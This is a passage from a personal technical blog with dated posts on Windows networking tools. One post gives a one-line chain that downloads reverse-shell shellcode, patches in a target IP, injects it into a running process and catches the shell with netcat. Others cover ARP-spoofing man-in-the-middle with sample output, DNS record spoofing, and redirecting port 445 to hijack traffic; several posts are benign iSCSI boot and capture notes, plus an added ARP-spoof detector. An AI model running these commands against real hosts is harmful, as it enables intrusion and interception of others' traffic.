Jul 31, 2023

NTHASH-win64 /download2hexa /input:https:%2f%2fgithub.com%2ferwan2212%2fNTHASH-FPC%2fraw%2fmaster%2frevshell64.bin| nthash-win64 /replace /old:7F000001 /new:C0A801BE|nthash-win64 /injectcodehexa /pid:996

The above will, in 3 steps:

-download a binary and convert it to its textual hexa form

-replace the default outbound IP (127.0.0.1) with the real target IP (here 192.168.1.190)

-inject the shellcode into the memory of the specified PID and execute it

On the remote host, run nc -l -p 4444 (note that you could also replace 4444 with a port of your choice in the shellcode).

Sep 04, 2022

A while ago, we saw here how we could play with VHD differencing disks and the StarWind SAN free product.

However, the poor scripting capabilities of StarWind SAN free, combined with a strict licensing model, make this solution dodgy.

Today, let's see how to achieve a better solution with PowerShell and the Windows iSCSI target capabilities.

First, let's have a look at the script below: all it does is create an iSCSI target for the incoming request if the target does not exist yet, thus enabling one to boot many client devices from one unique parent/master image.

Note: creating your master image (i.e. a Windows that can boot over the network using iSCSI) is not in scope here.


write-host "#!ipxe"
write-host "clear net0.dhcp/gateway:ipv4"
write-host "set gateway 0.0.0.0"
write-host "set initiator-iqn iqn.2006-11.1"
write-host "set keep-san 1"
#if pxesrv is running on the iscsi target, use ${next-server} instead of a hardcoded ip
write-host 'set target ${next-server}'
#
#the target name is the first argument (the client mac, as passed in the query string)
$TargetName = $args[0]
write-host "echo TargetName: "$TargetName
$vhdpath = "C:\_images\" + $args[0] + ".vhd"
write-host "echo vhdpath: "$vhdpath
$iqn ="iqn.1991-05.com.microsoft:"+$TargetName
write-host "echo iqn: "$iqn
#first boot of this client : create a differencing child of the master and publish it
if (-not(Test-Path -Path $vhdpath -PathType Leaf)) {
    $parent = "c:\_images\iscsi.vhd"
    #$result=New-VHD -ParentPath $parent -Path $vhdpath -Differencing -Confirm:$false
    $result=c:\temp\vmount.exe createchildvhd $vhdpath $parent
    $result=Import-IscsiVirtualDisk -Path $vhdpath
    #only the initiator iqn set above is allowed to connect to this target
    $result=New-IscsiServerTarget -TargetName $TargetName -InitiatorIds "iqn:iqn.2006-11.1"
    #option : Set-IscsiServerTarget -TargetName "child1" -InitiatorId "IQN:*"
    $result=Set-IscsiServerTarget -TargetName $TargetName -TargetIqn $iqn
    $result=Add-IscsiVirtualDiskTargetMapping -TargetName $TargetName -DevicePath $vhdpath
    write-host "echo iscsi target configured, enjoy !"
}
#
#either way, hand the client the sanboot line for its own target
write-host $('sanboot --keep iscsi:${target}:tcp:3260:0:' + $iqn)

Let's first run Tiny PXE Server (as admin, since we will be calling some low-level PowerShell cmdlets) and call our PowerShell script from a remote device like this: http://192.168.1.147/iscsi.ps1?aa-bb-cc-dd-ee-ff (replace the IP with whatever your iSCSI target is).

You should get a result like this in your browser:


#!ipxe
clear net0.dhcp/gateway:ipv4
set gateway 0.0.0.0
set initiator-iqn iqn.2006-11.1
set keep-san 1
set target ${next-server}
echo TargetName:  aa-bb-cc-dd-ee-ff
echo vhdpath:  C:\_images\aa-bb-cc-dd-ee-ff.vhd
echo iqn:  iqn.1991-05.com.microsoft:aa-bb-cc-dd-ee-ff
echo iscsi target configured, enjoy !
sanboot --keep iscsi:${target}:tcp:3260:0:iqn.1991-05.com.microsoft:aa-bb-cc-dd-ee-ff

And your iSCSI target should look like this:

You are now ready to boot your devices by setting your second-stage bootloader in TPS like this: http://@opt54/iscsi.ps1?@mac

Every PXE boot device will get a new image if it does not exist yet, or will boot from its existing image.
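A hardened variant of the iscsi.ps1 above, added here as an example (it is not the script from the post). It keeps the same layout (parent C:\_images\iscsi.vhd, children C:\_images\<mac>.vhd, vmount.exe in c:\temp) but, because the name comes straight from the HTTP query string and ends up in a file path and on the vmount.exe command line, it only accepts a MAC-shaped name and checks each provisioning step:

```powershell
# Added hardened variant of the post's iscsi.ps1 (my example, not the author's script).
# Assumed layout is the post's: parent C:\_images\iscsi.vhd, children C:\_images\<mac>.vhd,
# vmount.exe in c:\temp. The name comes straight from the HTTP query string, so it is
# validated before it reaches a file path or the vmount.exe command line.
$ImageRoot  = 'C:\_images'
$Parent     = Join-Path $ImageRoot 'iscsi.vhd'
$TargetName = [string]$args[0]

Write-Host '#!ipxe'
Write-Host 'clear net0.dhcp/gateway:ipv4'
Write-Host 'set gateway 0.0.0.0'
Write-Host 'set initiator-iqn iqn.2006-11.1'
Write-Host 'set keep-san 1'
Write-Host 'set target ${next-server}'

# TPS expands @mac to aa-bb-cc-dd-ee-ff: accept exactly that shape and nothing else,
# so a name like ..\..\something can never become part of a path or a command line.
if ($TargetName -notmatch '^[0-9a-f]{2}(-[0-9a-f]{2}){5}$') {
    Write-Host "echo rejected target name (expected a MAC address): $TargetName"
    exit 1
}

$VhdPath  = Join-Path $ImageRoot ($TargetName + '.vhd')
$Iqn      = 'iqn.1991-05.com.microsoft:' + $TargetName

# Belt and braces: whatever passed the regex must still resolve inside $ImageRoot.
$Resolved = [System.IO.Path]::GetFullPath($VhdPath)
$Prefix   = $ImageRoot + '\'
if (-not $Resolved.StartsWith($Prefix, [System.StringComparison]::OrdinalIgnoreCase)) {
    Write-Host "echo refusing a path outside ${ImageRoot}: $Resolved"
    exit 1
}
if (-not (Test-Path -Path $VhdPath -PathType Leaf)) {
    # Same provisioning steps as the post, but each one is checked so that a
    # half-built target is reported to the client instead of being booted.
    try {
        & 'c:\temp\vmount.exe' createchildvhd $VhdPath $Parent | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "vmount.exe returned $LASTEXITCODE" }
        Import-IscsiVirtualDisk -Path $VhdPath -ErrorAction Stop | Out-Null
        New-IscsiServerTarget -TargetName $TargetName -InitiatorIds 'iqn:iqn.2006-11.1' -ErrorAction Stop | Out-Null
        Set-IscsiServerTarget -TargetName $TargetName -TargetIqn $Iqn -ErrorAction Stop | Out-Null
        Add-IscsiVirtualDiskTargetMapping -TargetName $TargetName -DevicePath $VhdPath -ErrorAction Stop | Out-Null
        Write-Host 'echo iscsi target configured'
    } catch {
        Write-Host "echo provisioning failed: $($_.Exception.Message)"
        exit 1
    }
}
Write-Host ('sanboot --keep iscsi:${target}:tcp:3260:0:' + $Iqn)
```

A rejected or failed request only prints an echo line and exits, so the client never receives a sanboot line for a target that was not fully built.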

Side notes:

-when cloning an existing system to iSCSI, you may want to disable LWF (browse to \SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}, identify your NIC, and remove any line containing {B70D6460-3635-4D42-B866-B8AB1A24454C})

-when installing a new system to iSCSI, you may want to disable PagingFiles (browse to \SYSTEM\ControlSet001\Control\Session Manager\Memory Management and clear the string « PagingFiles ») – tip here: use setup.exe /noreboot from WinPE and then use regedit to open your \windows\system32\config\system hive.

Feb 24, 2019

A few days ago, I shared a command-line, layer 3 network sniffer based on WinDivert (netdump, here).

The command-line version offers a few options like capturing or not, choosing the network layer or the forward layer, etc.

Thus, sometimes it is also nice to have a simple (« start/stop ») GUI.
Now done.
Source code and binaries here on GitHub, as usual.
This version will automatically save the capture to a dated pcap file.

https://imgur.com/nLQJnRl.png

Feb 24, 2019

An interesting article about how to perform a network capture when no tools are installed locally.

Here.

In short, an example:

1-netsh trace start capture=yes Ethernet.Type=IPv4 IPv4.Address=157.59.136.1

2-netsh trace stop

3-get your capture from %userprofile%\AppData\Local\Temp\NetTraces\NetTrace.etl
-open it with Microsoft's Message Analyzer app
or
-convert it with

$s = New-PefTraceSession -Path "C:\output\path\spec\OutFile.Cap" -SaveOnStop
$s | Add-PefMessageProvider -Provider "C:\input\path\spec\Input.etl"
$s | Start-PefTraceSession

Feb 23, 2019

Let's play with WinPcap.

Quoting the WinPcap web site: « WinPcap consists of a driver that extends the operating system to provide low-level network access and a library that is used to easily access low-level network layers ».

Let's use it to perform a quick and easy man-in-the-middle attack with ARP spoofing.

Quoting Wikipedia: « a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other ».

Source code and binaries are available here.

Usage is:
arpspoof 1.0 by erwan2212@gmail.com
arpspoof list-interfaces
arpspoof interface-index ip1 ip2

Example:
arpspoof.exe 0 192.168.1.125 192.168.1.250
arpspoof 1.0 by erwan2212@gmail.com
arpspoof list-interfaces
arpspoof interface-index ip1 ip2
ip1:192.168.1.125 mac1:001DE0-567737
ip2:192.168.1.250 mac2:C05627-B7FD32
spoofed mac:94DE80-C2A41E
sending packets…press a key to stop…

192.168.1.125 is the victim (a computer on my network).
192.168.1.250 is my network gateway/router.
94DE80-C2A41E is my MAC address (i.e. the attacker's MAC address).

192.168.1.125 will believe that the MAC address of the router (192.168.1.250) is mine, i.e. 94DE80-C2A41E.
192.168.1.250 will believe that the MAC address of the victim (192.168.1.125) is mine, i.e. 94DE80-C2A41E.
In effect, all traffic between these 2 hosts will go through my computer.

One important thing not to forget: enable forwarding on your computer, or else all traffic between these 2 hosts will be dropped.
How? Easy:
-check your interfaces: netsh interface ipv4 show interfaces
-enable forwarding on the desired interface: netsh interface ipv4 set interface x forwarding="enabled"

Now you can perform an attack with intercept-dns from a previous article (don't forget to do a set layer=forward on the command line then).
Or simply sniff/capture the traffic with netdump.

Note that you could also use a GUI like IPTools to perform ARP spoofing.
See example screenshot here (C=client/victim, R=router).
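Seen from a host on the LAN, the attack above leaves a recognisable trace in the neighbour (ARP) table: the gateway's MAC no longer matches the one it had when the network was known-good, and a single MAC answers for more than one IP. The detection below is an added example (mine, not part of the post) that flags both conditions; the neighbour entries are constructed to mirror the post's values, and the attacker's own IP (192.168.1.99) is a placeholder since the post does not give it:

```powershell
# Added detection example (mine, not part of the post): flag the ARP state that arpspoof
# leaves behind, seen from a host on the LAN. Two signs: the gateway's MAC differs from the
# one recorded when the network was known-good, and one MAC answers for several IPs.
# Sample entries are constructed below; on a live machine pipe Get-NetNeighbor -AddressFamily IPv4
# into -Neighbors instead.
function ConvertTo-CanonicalMac([string]$Mac) {
    # arp -a shows 94-de-80-c2-a4-1e, the post shows 94DE80-C2A41E: compare on one form
    return ($Mac -replace '[-:]', '').ToUpperInvariant()
}

function Find-ArpAnomalies {
    param(
        [Parameter(Mandatory)][object[]]$Neighbors,   # objects with IPAddress and LinkLayerAddress
        [Parameter(Mandatory)][string]$GatewayIP,
        [Parameter(Mandatory)][string]$GatewayMac     # known-good value, recorded out of band
    )
    $findings = @()

    # 1. the gateway's MAC has drifted from the recorded one
    foreach ($n in $Neighbors) {
        if ($n.IPAddress -eq $GatewayIP -and
            (ConvertTo-CanonicalMac $n.LinkLayerAddress) -ne (ConvertTo-CanonicalMac $GatewayMac)) {
            $findings += "gateway $GatewayIP now resolves to $($n.LinkLayerAddress), expected $GatewayMac"
        }
    }

    # 2. one MAC claiming more than one IP (router and another host both "became" the same card)
    $groups = $Neighbors | Group-Object -Property { ConvertTo-CanonicalMac $_.LinkLayerAddress }
    foreach ($g in $groups) {
        if ($g.Count -gt 1) {
            $ips = ($g.Group | ForEach-Object { $_.IPAddress } | Sort-Object) -join ', '
            $findings += "MAC $($g.Name) claims several IPs: $ips"
        }
    }
    return $findings
}

# Constructed sample mirroring the post's example as the victim would see it after spoofing:
# the router 192.168.1.250 now sits at the attacker's 94DE80-C2A41E, which also owns the
# attacker's own IP (192.168.1.99 here is a placeholder; the post does not give it).
$sample = @(
    [pscustomobject]@{ IPAddress = '192.168.1.250'; LinkLayerAddress = '94-DE-80-C2-A4-1E' }
    [pscustomobject]@{ IPAddress = '192.168.1.99';  LinkLayerAddress = '94-DE-80-C2-A4-1E' }
    [pscustomobject]@{ IPAddress = '192.168.1.10';  LinkLayerAddress = '00-11-22-33-44-55' }
)
Find-ArpAnomalies -Neighbors $sample -GatewayIP '192.168.1.250' -GatewayMac 'C05627-B7FD32'
```

Run on the sample it reports both the gateway MAC change and the duplicate MAC; a scheduled task running it against Get-NetNeighbor output gives a cheap early warning for this kind of spoofing.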

Feb 18, 2019

Playing around with intercepting traffic (diverting, MITM, etc.), I needed a standalone DNS server.

Sharing it here.

You can use the local Windows resolver OR use dnsquery, which then allows you to choose between UDP/TCP and a remote DNS server.
The remote DNS server has to be set in the config.ini file (see the included ini file).
Still via config.ini, you can also « spoof » A or PTR records (example: have www.facebook.com resolve to 127.0.0.1).

https://i.imgur.com/zSqyGvy.png

Feb 03, 2019

Still playing with WinDivert (see the original article here), this time I decided to code a transparent proxy.

The principle is the following: divert a destination port (say tcp:80) to a new destination_ip:port.

On the destination IP, I am running Privoxy (but any proxy supporting transparent mode would do).
In the Privoxy config file, I am setting accept-intercepted-requests=1.

This will be completely transparent for the source application.

Nothing really fancy in the code, except maybe me storing the original remote IP (which we will need to re-apply on the traffic back) in an array dynamic_source_port=remote_ip.

Source code and binaries can be found here.

Jan 27, 2019

In a previous article, I commented on a nice open-source library (WinDivert) and shared a basic FreePascal demo using it.

This time I used this library to redirect (or reuse) a local port used by another application or service to another local port.

It could be handy to fool firewalls or to hijack traffic going to a service.

One of the best examples that comes to my mind is redirecting local port 445 to an application/shell of your own listening on local port 1337.
Something you could not achieve with netsh port redirect, as the port is already in use and/or used by a kernel service (SMB in our case).

The command line would then be tcpredir 445 1337.

Source code and binaries on GitHub.

One possible application example:

-divert local port 445 to port 1337
-set up an SMB server on port 1337

https://i.imgur.com/kSCrC9M.png

Jan 27, 2019

Quoting the original web site (here):

Windows Packet Divert (WinDivert) is a user-mode packet capture-and-divert package for Windows 2008, Windows 7, Windows 8, Windows 10 and Windows 2016.

WinDivert allows user-mode applications to capture/modify/drop network packets sent to/from the Windows network stack. In summary, WinDivert can:

-capture network packets
-filter/drop network packets
-sniff network packets
-(re)inject network packets
-modify network packets

WinDivert can be used to implement user-mode packet filters, packet sniffers, firewalls, NAT, VPNs, tunneling applications, etc.

The main features of WinDivert include:

-packet interception, sniffing, or dropping modes
-supports loopback (localhost) traffic
-full IPv6 support
-network layer
-simple yet powerful API
-high-level filtering language
-filter priorities
-silent installation
-freely available under the terms of the GNU Lesser General Public License (LGPL)

Similar to the raw socket sniffer (here), I have shared a demo (in FreePascal) here.

Because WinDivert is a kernel driver, the issues inherent to Windows raw sockets do not apply here.

Jan 06, 2019

A slight update to the previous version.

The syntax is now:

dnsping 0.6 by erwan2212@gmail.com
usage: dnsping query nameserver query
usage: dnsping query nameserver query delay_seconds
usage: dnsping cache
usage: dnsping flush
usage: dnsping add nameserver hostname ip
usage: dnsping delete nameserver hostname ip

Additions are: cache & flush, add & delete (against an MS DNS server).

Download here.

Source code is here.